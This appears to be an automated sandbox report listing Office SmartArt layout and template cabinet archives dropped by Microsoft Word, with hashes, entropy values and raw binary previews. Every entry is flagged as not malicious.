                                                                                                                                                                                                                                                                SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                                                                                                                                                                                                SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20554
                                                                                                                                                                                                                                                                Entropy (8bit):7.612044504501488
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                                                                                                                                                                MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                                                                                                                                                                SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                                                                                                                                                                SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                                                                                                                                                                SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):22149
                                                                                                                                                                                                                                                                Entropy (8bit):7.659898883631361
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                                                                                                                                                                MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                                                                                                                                                                SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                                                                                                                                                                SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                                                                                                                                                                SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):22594
                                                                                                                                                                                                                                                                Entropy (8bit):7.674816892242868
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                                                                                                                                                                MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                                                                                                                                                                SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                                                                                                                                                                SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                                                                                                                                                                SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):21791
                                                                                                                                                                                                                                                                Entropy (8bit):7.65837691872985
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                                                                                                                                                                MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                                                                                                                                                                SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                                                                                                                                                                SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                                                                                                                                                                SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):19893
                                                                                                                                                                                                                                                                Entropy (8bit):7.592090622603185
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                                                                                                                                                                MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                                                                                                                                                                SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                                                                                                                                                                SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                                                                                                                                                                SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):19288
                                                                                                                                                                                                                                                                Entropy (8bit):7.570850633867256
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                                                                                                                                                                MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                                                                                                                                                                SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                                                                                                                                                                SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                                                                                                                                                                SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):21111
                                                                                                                                                                                                                                                                Entropy (8bit):7.6297992466897675
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                                                                                                                                                                MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                                                                                                                                                                SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                                                                                                                                                                SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                                                                                                                                                                SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25314
                                                                                                                                                                                                                                                                Entropy (8bit):7.729848360340861
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                                                                                                                                                                MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                                                                                                                                                                                                SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                                                                                                                                                                SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                                                                                                                                                                SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):21875
                                                                                                                                                                                                                                                                Entropy (8bit):7.6559132103953305
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                                                                                                                                                                MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                                                                                                                                                                SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                                                                                                                                                                SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                                                                                                                                                                SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):21357
                                                                                                                                                                                                                                                                Entropy (8bit):7.641082043198371
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                                                                                                                                                                MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                                                                                                                                                                SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                                                                                                                                                                                                SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                                                                                                                                                                SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):22340
                                                                                                                                                                                                                                                                Entropy (8bit):7.668619892503165
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                                                                                                                                                                MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                                                                                                                                                                SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                                                                                                                                                                SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                                                                                                                                                                SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):42788
                                                                                                                                                                                                                                                                Entropy (8bit):7.89307894056
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                                                                                                                                                                                                MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
